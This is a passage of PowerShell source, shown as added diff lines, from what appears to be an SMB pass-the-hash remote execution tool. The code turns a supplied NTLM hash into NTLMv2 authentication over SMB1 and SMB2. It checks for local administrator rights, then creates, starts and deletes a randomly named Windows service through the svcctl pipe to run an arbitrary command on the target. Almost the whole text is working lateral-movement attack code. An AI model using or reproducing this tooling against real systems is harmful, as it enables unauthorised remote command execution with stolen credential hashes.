$NTLMSSP_negotiate + $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data + $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length + $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service + $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + } + + $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null + $SMB_client_stream.Flush() + $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + $SMB_client_stage = 'exit' + } + + } + + } + + $SMB_NTLMSSP = [System.BitConverter]::ToString($SMB_client_receive) + $SMB_NTLMSSP = $SMB_NTLMSSP -replace "-","" + $SMB_NTLMSSP_index = $SMB_NTLMSSP.IndexOf("4E544C4D53535000") + $SMB_NTLMSSP_bytes_index = $SMB_NTLMSSP_index / 2 + $SMB_domain_length = DataLength2 ($SMB_NTLMSSP_bytes_index + 12) $SMB_client_receive + $SMB_target_length = DataLength2 ($SMB_NTLMSSP_bytes_index + 40) $SMB_client_receive + $SMB_session_ID = $SMB_client_receive[44..51] + $SMB_NTLM_challenge = $SMB_client_receive[($SMB_NTLMSSP_bytes_index + 24)..($SMB_NTLMSSP_bytes_index + 31)] + $SMB_target_details = $SMB_client_receive[($SMB_NTLMSSP_bytes_index + 56 + $SMB_domain_length)..($SMB_NTLMSSP_bytes_index + 55 + $SMB_domain_length + $SMB_target_length)] + $SMB_target_time_bytes = $SMB_target_details[($SMB_target_details.length - 12)..($SMB_target_details.length - 5)] + $NTLM_hash_bytes = (&{for ($i = 0;$i -lt $hash.length;$i += 2){$hash.SubString($i,2)}}) -join "-" + $NTLM_hash_bytes = $NTLM_hash_bytes.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + $auth_hostname = (Get-ChildItem -path env:computername).Value + $auth_hostname_bytes = [System.Text.Encoding]::Unicode.GetBytes($auth_hostname) + $auth_domain_bytes = [System.Text.Encoding]::Unicode.GetBytes($Domain) + $auth_username_bytes = [System.Text.Encoding]::Unicode.GetBytes($username) + $auth_domain_length = [System.BitConverter]::GetBytes($auth_domain_bytes.Length) + $auth_domain_length = $auth_domain_length[0,1] + $auth_domain_length = [System.BitConverter]::GetBytes($auth_domain_bytes.Length) + $auth_domain_length = $auth_domain_length[0,1] + $auth_username_length = [System.BitConverter]::GetBytes($auth_username_bytes.Length) + $auth_username_length = $auth_username_length[0,1] + $auth_hostname_length = [System.BitConverter]::GetBytes($auth_hostname_bytes.Length) + $auth_hostname_length = $auth_hostname_length[0,1] + $auth_domain_offset = 0x40,0x00,0x00,0x00 + $auth_username_offset = [System.BitConverter]::GetBytes($auth_domain_bytes.Length + 64) + $auth_hostname_offset = [System.BitConverter]::GetBytes($auth_domain_bytes.Length + $auth_username_bytes.Length + 64) + $auth_LM_offset = [System.BitConverter]::GetBytes($auth_domain_bytes.Length + $auth_username_bytes.Length + $auth_hostname_bytes.Length + 64) + $auth_NTLM_offset = [System.BitConverter]::GetBytes($auth_domain_bytes.Length + $auth_username_bytes.Length + $auth_hostname_bytes.Length + 88) + $HMAC_MD5 = New-Object System.Security.Cryptography.HMACMD5 + $HMAC_MD5.key = $NTLM_hash_bytes + $username_and_target = $username.ToUpper() + $username_and_target_bytes = [System.Text.Encoding]::Unicode.GetBytes($username_and_target) + $username_and_target_bytes += $auth_domain_bytes + $NTLMv2_hash = $HMAC_MD5.ComputeHash($username_and_target_bytes) + $client_challenge = [String](1..8 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)}) + $client_challenge_bytes = $client_challenge.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + + $security_blob_bytes = 0x01,0x01,0x00,0x00, + 0x00,0x00,0x00,0x00 + + $SMB_target_time_bytes + + $client_challenge_bytes + + 0x00,0x00,0x00,0x00 + + $SMB_target_details + + 0x00,0x00,0x00,0x00, + 0x00,0x00,0x00,0x00 + + $server_challenge_and_security_blob_bytes = $SMB_NTLM_challenge + $security_blob_bytes + $HMAC_MD5.key = $NTLMv2_hash + $NTLMv2_response = $HMAC_MD5.ComputeHash($server_challenge_and_security_blob_bytes) + + if($SMB_signing) + { + $session_base_key = $HMAC_MD5.ComputeHash($NTLMv2_response) + $session_key = $session_base_key + $HMAC_SHA256 = New-Object System.Security.Cryptography.HMACSHA256 + $HMAC_SHA256.key = $session_key + } + + $NTLMv2_response = $NTLMv2_response + $security_blob_bytes + $NTLMv2_response_length = [System.BitConverter]::GetBytes($NTLMv2_response.Length) + $NTLMv2_response_length = $NTLMv2_response_length[0,1] + $SMB_session_key_offset = [System.BitConverter]::GetBytes($auth_domain_bytes.Length + $auth_username_bytes.Length + $auth_hostname_bytes.Length + $NTLMv2_response.Length + 88) + + $NTLMSSP_response = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00, + 0x03,0x00,0x00,0x00, + 0x18,0x00, + 0x18,0x00 + + $auth_LM_offset + + $NTLMv2_response_length + + $NTLMv2_response_length + + $auth_NTLM_offset + + $auth_domain_length + + $auth_domain_length + + $auth_domain_offset + + $auth_username_length + + $auth_username_length + + $auth_username_offset + + $auth_hostname_length + + $auth_hostname_length + + $auth_hostname_offset + + $SMB_session_key_length + + $SMB_session_key_length + + $SMB_session_key_offset + + $SMB_negotiate_flags + + $auth_domain_bytes + + $auth_username_bytes + + $auth_hostname_bytes + + 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, + 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 + + $NTLMv2_response + + if($SMB_version -eq 'SMB1') + { + $SMB_user_ID = $SMB_client_receive[32,33] + $packet_SMB_header = Get-PacketSMBHeader 0x73 0x18 0x07,0xc8 0xff,0xff $process_ID_bytes $SMB_user_ID + + if($SMB_signing) + { + $packet_SMB_header["SMBHeader_Flags2"] = 0x05,0x48 + } + + $packet_SMB_header["SMBHeader_UserID"] = $SMB_user_ID + $packet_NTLMSSP_negotiate = Get-PacketNTLMSSPAuth $NTLMSSP_response + $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header + $NTLMSSP_negotiate = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_negotiate + $packet_SMB_data = Get-PacketSMBSessionSetupAndXRequest $NTLMSSP_negotiate + $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data + $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length + $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service + $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + } + else + { + $SMB2_message_ID += 1 + $packet_SMB2_header = Get-PacketSMB2Header 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $packet_NTLMSSP_auth = Get-PacketNTLMSSPAuth $NTLMSSP_response + $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header + $NTLMSSP_auth = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_auth + $packet_SMB2_data = Get-PacketSMB2SessionSetupRequest $NTLMSSP_auth + $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data + $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length + $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service + $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + } + + $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null + $SMB_client_stream.Flush() + $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + + if($SMB_version -eq 'SMB1') + { + + if([System.BitConverter]::ToString($SMB_client_receive[9..12]) -eq '00-00-00-00') + { + Write-Verbose "$output_username successfully authenticated on $Target" + $login_successful = $true + } + else + { + Write-Output "$output_username failed to authenticate on $Target" + $login_successful = $false + } + + } + else + { + if([System.BitConverter]::ToString($SMB_client_receive[12..15]) -eq '00-00-00-00') + { + Write-Verbose "$output_username successfully authenticated on $Target" + $login_successful = $true + } + else + { + Write-Output "$output_username failed to authenticate on $Target" + $login_successful = $false + } + + } + + if($login_successful) + { + $SMB_path = "\\" + $Target + "\IPC$" + + if($SMB_version -eq 'SMB1') + { + $SMB_path_bytes = [System.Text.Encoding]::UTF8.GetBytes($SMB_path) + 0x00 + } + else + { + $SMB_path_bytes = [System.Text.Encoding]::Unicode.GetBytes($SMB_path) + } + + $SMB_named_pipe_UUID = 0x81,0xbb,0x7a,0x36,0x44,0x98,0xf1,0x35,0xad,0x32,0x98,0xf0,0x38,0x00,0x10,0x03 + + if(!$Service) + { + $SMB_service_random = [String]::Join("00-",(1..20 | ForEach-Object{"{0:X2}-" -f (Get-Random -Minimum 65 -Maximum 90)})) + $SMB_service = $SMB_service_random -replace "-00","" + $SMB_service = $SMB_service.Substring(0,$SMB_service.Length - 1) + $SMB_service = $SMB_service.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + $SMB_service = New-Object System.String ($SMB_service,0,$SMB_service.Length) + $SMB_service_random += '00-00-00-00-00' + $SMB_service_bytes = $SMB_service_random.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + } + else + { + $SMB_service = $Service + $SMB_service_bytes = [System.Text.Encoding]::Unicode.GetBytes($SMB_service) + + if([Bool]($SMB_service.Length % 2)) + { + $SMB_service_bytes += 0x00,0x00 + } + else + { + $SMB_service_bytes += 0x00,0x00,0x00,0x00 + + } + + } + + $SMB_service_length = [System.BitConverter]::GetBytes($SMB_service.length + 1) + + if($CommandCOMSPEC -eq 'Y') + { + $Command = "%COMSPEC% /C `"" + $Command + "`"" + } + else + { + $Command = "`"" + $Command + "`"" + } + + [System.Text.Encoding]::UTF8.GetBytes($Command) | ForEach-Object{$SMBExec_command += "{0:X2}-00-" -f $_} + + if([Bool]($Command.Length % 2)) + { + $SMBExec_command += '00-00' + } + else + { + $SMBExec_command += '00-00-00-00' + } + + $SMBExec_command_bytes = $SMBExec_command.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + $SMBExec_command_length_bytes = [System.BitConverter]::GetBytes($SMBExec_command_bytes.Length / 2) + + + if($SMB_version -eq 'SMB1') + { + $SMB_client_stage = 'TreeConnectAndXRequest' + + :SMB_execute_loop while ($SMB_client_stage -ne 'exit') + { + + switch ($SMB_client_stage) + { + + 'TreeConnectAndXRequest' + { + $packet_SMB_header = Get-PacketSMBHeader 0x75 0x18 0x01,0x48 0xff,0xff $process_ID_bytes $SMB_user_ID + + if($SMB_signing) + { + $MD5 = New-Object -TypeName System.Security.Cryptography.MD5CryptoServiceProvider + $packet_SMB_header["SMBHeader_Flags2"] = 0x05,0x48 + $SMB_signing_counter = 2 + [Byte[]]$SMB_signing_sequence = [System.BitConverter]::GetBytes($SMB_signing_counter) + 0x00,0x00,0x00,0x00 + $packet_SMB_header["SMBHeader_Signature"] = $SMB_signing_sequence + } + + $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header + $packet_SMB_data = Get-PacketSMBTreeConnectAndXRequest $SMB_path_bytes + $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data + $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length + $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service + + if($SMB_signing) + { + $SMB_sign = $session_key + $SMB_header + $SMB_data + $SMB_signature = $MD5.ComputeHash($SMB_sign) + $SMB_signature = $SMB_signature[0..7] + $packet_SMB_header["SMBHeader_Signature"] = $SMB_signature + $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header + } + + $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null + $SMB_client_stream.Flush() + $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + $SMB_client_stage = 'CreateAndXRequest' + } + + 'CreateAndXRequest' + { + $SMB_named_pipe_bytes = 0x5c,0x73,0x76,0x63,0x63,0x74,0x6c,0x00 # \svcctl + $SMB_tree_ID = $SMB_client_receive[28,29] + $packet_SMB_header = Get-PacketSMBHeader 0xa2 0x18 0x02,0x28 $SMB_tree_ID $process_ID_bytes $SMB_user_ID + + if($SMB_signing) + { + $packet_SMB_header["SMBHeader_Flags2"] = 0x05,0x48 + $SMB_signing_counter = $SMB_signing_counter + 2 + [Byte[]]$SMB_signing_sequence = [System.BitConverter]::GetBytes($SMB_signing_counter) + 0x00,0x00,0x00,0x00 + $packet_SMB_header["SMBHeader_Signature"] = $SMB_signing_sequence + } + + $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header + $packet_SMB_data = Get-PacketSMBNTCreateAndXRequest $SMB_named_pipe_bytes + $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data + $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length + $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service + + if($SMB_signing) + { + $SMB_sign = $session_key + $SMB_header + $SMB_data + $SMB_signature = $MD5.ComputeHash($SMB_sign) + $SMB_signature = $SMB_signature[0..7] + $packet_SMB_header["SMBHeader_Signature"] = $SMB_signature + $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header + } + + $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null + $SMB_client_stream.Flush() + $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + $SMB_client_stage = 'RPCBind' + } + + 'RPCBind' + { + $SMB_FID = $SMB_client_receive[42,43] + $packet_SMB_header = Get-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $process_ID_bytes $SMB_user_ID + + if($SMB_signing) + { + $packet_SMB_header["SMBHeader_Flags2"] = 0x05,0x48 + $SMB_signing_counter = $SMB_signing_counter + 2 + [Byte[]]$SMB_signing_sequence = [System.BitConverter]::GetBytes($SMB_signing_counter) + 0x00,0x00,0x00,0x00 + $packet_SMB_header["SMBHeader_Signature"] = $SMB_signing_sequence + } + + $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header + $packet_RPC_data = Get-PacketRPCBind 1 0xb8,0x10 0x01 0x00,0x00 $SMB_named_pipe_UUID 0x02,0x00 + $packet_SMB_data = Get-PacketSMBWriteAndXRequest + $packet_SMB_data["SMBWriteAndXRequest_Remaining"] = 0x48,0x00 + $packet_SMB_data["SMBWriteAndXRequest_DataLengthLow"] = 0x48,0x00 + $packet_SMB_data["SMBWriteAndXRequest_ByteCount"] = 0x48,0x00 + $packet_SMB_data["SMBWriteAndXRequest_FID"] = $SMB_FID + $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data + $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data + $RPC_data_length = $SMB_data.Length + $RPC_data.Length + $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_Length + $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service + + if($SMB_signing) + { + $SMB_sign = $session_key + $SMB_header + $SMB_data + $RPC_data + $SMB_signature = $MD5.ComputeHash($SMB_sign) + $SMB_signature = $SMB_signature[0..7] + $packet_SMB_header["SMBHeader_Signature"] = $SMB_signature + $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header + } + + $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null + $SMB_client_stream.Flush() + $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + $SMB_client_stage = 'ReadAndXRequest' + $SMB_client_stage_next = 'OpenSCManagerW' + } + + 'ReadAndXRequest' + { + Start-Sleep -m $Sleep + $packet_SMB_header = Get-PacketSMBHeader 0x2e 0x18 0x05,0x28 $SMB_tree_ID $process_ID_bytes $SMB_user_ID + + if($SMB_signing) + { + $packet_SMB_header["SMBHeader_Flags2"] = 0x05,0x48 + $SMB_signing_counter = $SMB_signing_counter + 2 + [Byte[]]$SMB_signing_sequence = [System.BitConverter]::GetBytes($SMB_signing_counter) + 0x00,0x00,0x00,0x00 + $packet_SMB_header["SMBHeader_Signature"] = $SMB_signing_sequence + } + + $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header + $packet_SMB_data = Get-PacketSMBReadAndXRequest + $packet_SMB_data["SMBReadAndXRequest_FID"] = $SMB_FID + $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data + $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length + $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service + + if($SMB_signing) + { + $SMB_sign = $session_key + $SMB_header + $SMB_data + $SMB_signature = $MD5.ComputeHash($SMB_sign) + $SMB_signature = $SMB_signature[0..7] + $packet_SMB_header["SMBHeader_Signature"] = $SMB_signature + $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header + } + + $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null + $SMB_client_stream.Flush() + $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + $SMB_client_stage = $SMB_client_stage_next + } + + 'OpenSCManagerW' + { + $packet_SMB_header = Get-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $process_ID_bytes $SMB_user_ID + + if($SMB_signing) + { + $packet_SMB_header["SMBHeader_Flags2"] = 0x05,0x48 + $SMB_signing_counter = $SMB_signing_counter + 2 + [Byte[]]$SMB_signing_sequence = [System.BitConverter]::GetBytes($SMB_signing_counter) + 0x00,0x00,0x00,0x00 + $packet_SMB_header["SMBHeader_Signature"] = $SMB_signing_sequence + } + + $packet_SCM_data = Get-PacketSCMOpenSCManagerW $SMB_service_bytes $SMB_service_length + $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data + $packet_RPC_data = Get-PacketRPCRequest 0x03 $SCM_data.length 0 0 0x01,0x00,0x00,0x00 0x00,0x00 0x0f,0x00 + $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header + $packet_SMB_data = Get-PacketSMBWriteAndXRequest $SCM_data.length + $packet_SMB_data["SMBWriteAndXRequest_FID"] = $SMB_FID + $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data + $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data + $RPC_data_length = $SMB_data.Length + $SCM_data.Length + $RPC_data.Length + $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length + $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service + + if($SMB_signing) + { + $SMB_sign = $session_key + $SMB_header + $SMB_data + $RPC_data + $SCM_data + $SMB_signature = $MD5.ComputeHash($SMB_sign) + $SMB_signature = $SMB_signature[0..7] + $packet_SMB_header["SMBHeader_Signature"] = $SMB_signature + $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header + } + + $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SCM_data + $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null + $SMB_client_stream.Flush() + $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + $SMB_client_stage = 'ReadAndXRequest' + $SMB_client_stage_next = 'CheckAccess' + } + + 'CheckAccess' + { + + if([System.BitConverter]::ToString($SMB_client_receive[108..111]) -eq '00-00-00-00' -and [System.BitConverter]::ToString($SMB_client_receive[88..107]) -ne '00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00') + { + $SMB_service_manager_context_handle = $SMB_client_receive[88..107] + + if($SMB_execute) + { + Write-Verbose "$output_username is a local administrator on $Target" + $SMB_client_stage = 'CreateServiceW' + } + else + { + Write-Output "$output_username is a local administrator on $Target" + $SMB_close_service_handle_stage = 2 + $SMB_client_stage = 'CloseServiceHandle' + } + + } + elseif([System.BitConverter]::ToString($SMB_client_receive[108..111]) -eq '05-00-00-00') + { + Write-Output "$output_username is not a local administrator on $Target" + $SMBExec_failed = $true + } + else + { + Write-Output "Something went wrong with $Target" + $SMBExec_failed = $true + } + + } + + 'CreateServiceW' + { + $packet_SMB_header = Get-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $process_ID_bytes $SMB_user_ID + + if($SMB_signing) + { + $packet_SMB_header["SMBHeader_Flags2"] = 0x05,0x48 + $SMB_signing_counter = $SMB_signing_counter + 2 + [Byte[]]$SMB_signing_sequence = [System.BitConverter]::GetBytes($SMB_signing_counter) + 0x00,0x00,0x00,0x00 + $packet_SMB_header["SMBHeader_Signature"] = $SMB_signing_sequence + } + + $packet_SCM_data = Get-PacketSCMCreateServiceW $SMB_service_manager_context_handle $SMB_service_bytes $SMB_service_length $SMBExec_command_bytes $SMBExec_command_length_bytes + $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data + $packet_RPC_data = Get-PacketRPCRequest 0x03 $SCM_data.length 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 + $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header + $packet_SMB_data = Get-PacketSMBWriteAndXRequest $SCM_data.length + $packet_SMB_data["SMBWriteAndXRequest_FID"] = $SMB_FID + $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data + $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data + $RPC_data_length = $SMB_data.Length + $SCM_data.Length + $RPC_data.Length + $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length + $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service + + if($SMB_signing) + { + $SMB_sign = $session_key + $SMB_header + $SMB_data + $RPC_data + $SCM_data + $SMB_signature = $MD5.ComputeHash($SMB_sign) + $SMB_signature = $SMB_signature[0..7] + $packet_SMB_header["SMBHeader_Signature"] = $SMB_signature + $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header + } + + $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SCM_data + $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null + $SMB_client_stream.Flush() + $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + $SMB_client_stage = 'ReadAndXRequest' + $SMB_client_stage_next = 'StartServiceW' + } + + 'StartServiceW' + { + + if([System.BitConverter]::ToString($SMB_client_receive[112..115]) -eq '00-00-00-00') + { + Write-Verbose "Service $SMB_service created on $Target" + $SMB_service_context_handle = $SMB_client_receive[92..111] + $packet_SMB_header = Get-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $process_ID_bytes $SMB_user_ID + + if($SMB_signing) + { + $packet_SMB_header["SMBHeader_Flags2"] = 0x05,0x48 + $SMB_signing_counter = $SMB_signing_counter + 2 + [Byte[]]$SMB_signing_sequence = [System.BitConverter]::GetBytes($SMB_signing_counter) + 0x00,0x00,0x00,0x00 + $packet_SMB_header["SMBHeader_Signature"] = $SMB_signing_sequence + } + + $packet_SCM_data = Get-PacketSCMStartServiceW $SMB_service_context_handle + $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data + $packet_RPC_data = Get-PacketRPCRequest 0x03 $SCM_data.length 0 0 0x03,0x00,0x00,0x00 0x00,0x00 0x13,0x00 + $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header + $packet_SMB_data = Get-PacketSMBWriteAndXRequest $SCM_data.length + $packet_SMB_data["SMBWriteAndXRequest_FID"] = $SMB_FID + $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data + $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data + $RPC_data_length = $SMB_data.Length + $SCM_data.Length + $RPC_data.Length + $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length + $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service + + if($SMB_signing) + { + $SMB_sign = $session_key + $SMB_header + $SMB_data + $RPC_data + $SCM_data + $SMB_signature = $MD5.ComputeHash($SMB_sign) + $SMB_signature = $SMB_signature[0..7] + $packet_SMB_header["SMBHeader_Signature"] = $SMB_signature + $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header + } + + $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SCM_data + Write-Verbose "Trying to execute command on $Target" + $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null + $SMB_client_stream.Flush() + $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + $SMB_client_stage = 'ReadAndXRequest' + $SMB_client_stage_next = 'DeleteServiceW' + } + else + { + Write-Output "Service creation fault context mismatch" + $SMBExec_failed = $true + } + + } + + 'DeleteServiceW' + { + + if([System.BitConverter]::ToString($SMB_client_receive[88..91]) -eq '1d-04-00-00') + { + Write-Output "Command executed with service $SMB_service on $Target" + } + elseif([System.BitConverter]::ToString($SMB_client_receive[88..91]) -eq '02-00-00-00') + { + Write-Output "Service $SMB_service failed to start on $Target" + } + + $packet_SMB_header = Get-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $process_ID_bytes $SMB_user_ID + + if($SMB_signing) + { + $packet_SMB_header["SMBHeader_Flags2"] = 0x05,0x48 + $SMB_signing_counter = $SMB_signing_counter + 2 + [Byte[]]$SMB_signing_sequence = [System.BitConverter]::GetBytes($SMB_signing_counter) + 0x00,0x00,0x00,0x00 + $packet_SMB_header["SMBHeader_Signature"] = $SMB_signing_sequence + } + + $packet_SCM_data = Get-PacketSCMDeleteServiceW $SMB_service_context_handle + $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data + $packet_RPC_data = Get-PacketRPCRequest 0x03 $SCM_data.length 0 0 0x04,0x00,0x00,0x00 0x00,0x00 0x02,0x00 + $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header + $packet_SMB_data = Get-PacketSMBWriteAndXRequest $SCM_data.length + $packet_SMB_data["SMBWriteAndXRequest_FID"] = $SMB_FID + $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data + $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data + $RPC_data_length = $SMB_data.Length + $SCM_data.Length + $RPC_data.Length + $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length + $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service + + if($SMB_signing) + { + $SMB_sign = $session_key + $SMB_header + $SMB_data + $RPC_data + $SCM_data + $SMB_signature = $MD5.ComputeHash($SMB_sign) + $SMB_signature = $SMB_signature[0..7] + $packet_SMB_header["SMBHeader_Signature"] = $SMB_signature + $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header + } + + $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SCM_data + + $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null + $SMB_client_stream.Flush() + $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null + $SMB_client_stage = 'ReadAndXRequest' + $SMB_client_stage_next = 'CloseServiceHandle' + $SMB_close_service_handle_stage = 1 + } + + 'CloseServiceHandle' + { + if($SMB_close_service_handle_stage -eq 1) + { + Write-Verbose "Service $SMB_service deleted on $Target" + $SMB_close_service_handle_stage++ + $packet_SCM_data = Get-PacketSCMCloseServiceHandle $SMB_service_context_handle + } + else + { + $SMB_client_stage = 'CloseRequest' + $packet_SCM_data = Get-PacketSCMCloseServiceHandle $SMB_service_manager_context_handle + } + $packet_SMB_header = Get-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $process_ID_bytes $SMB_user_ID + + if($SMB_signing) + { + $packet_SMB_header["SMBHeader_Flags2"] = 0x05,0x48 + $SMB_signing_counter = $SMB_signing_counter + 2 + [Byte[]]$SMB_signing_sequence = [System.BitConverter]::GetBytes($SMB_signing_counter) + 0x00,0x00,0x00,0x00 + $packet_SMB_header["SMBHeader_Signature"] = $SMB_signing_sequence + } + + $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data + $packet_RPC_data = Get-PacketRPCRequest 0x03 $SCM_data.length 0 0 0x05,0x00,0x00,0x00 0x00,0x00 0x00,0x00 + $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header + $packet_SMB_data = Get-PacketSMBWriteAndXRequest $SCM_data.length + $packet_SMB_data["SMBWriteAndXRequest_FID"] = $SMB_FID + $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data + $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data + $RPC_data_length = $SMB_data.Length + $SCM_data.Length + $RPC_data.Length + $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length + $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service + + if($SMB_signing) + { + $SMB_sign = $session_key + $SMB_header + $SMB_data + $RPC_data + 